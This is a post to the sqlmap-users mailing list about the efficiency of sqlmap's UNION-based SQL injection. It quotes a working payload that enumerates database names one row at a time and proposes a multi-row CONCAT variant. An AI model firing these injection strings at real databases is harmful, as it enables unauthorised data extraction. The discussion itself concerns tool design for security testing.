Currently, it seems that sqlmap will use a payload such as the following is a UNIONable parameter is found that can only return one row in order for data to be exfil’ed.
-16301 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71787a7871,IFNULL(CAST(schema_name AS CHAR),0x20),0x716a706271) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL When enumerating databases in an injection like this, sqlmap will make a single request per db name (note the LIMIT clause). This is a bit inefficient. I understand there may be length limitations to query string parameters, but I’m curious why sqlmap wouldn’t use a more efficient payload, such as the following. -16301 UNION ALL SELECT NULL,NULL,CONCAT(0x41414141, (SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1), 0x41414141,(SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL Error-based payloads certainly have length limitations in the data they can get out per request, but is there something preventing sqlmap from implementing a more efficient single-row UNION strategy when exfiltrating data? Let me know if this doesn’t make sense.
signature.asc
Description: Message signed with OpenPGP
------------------------------------------------------------------------------ Check out the vibrant tech community on one of the world's most engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
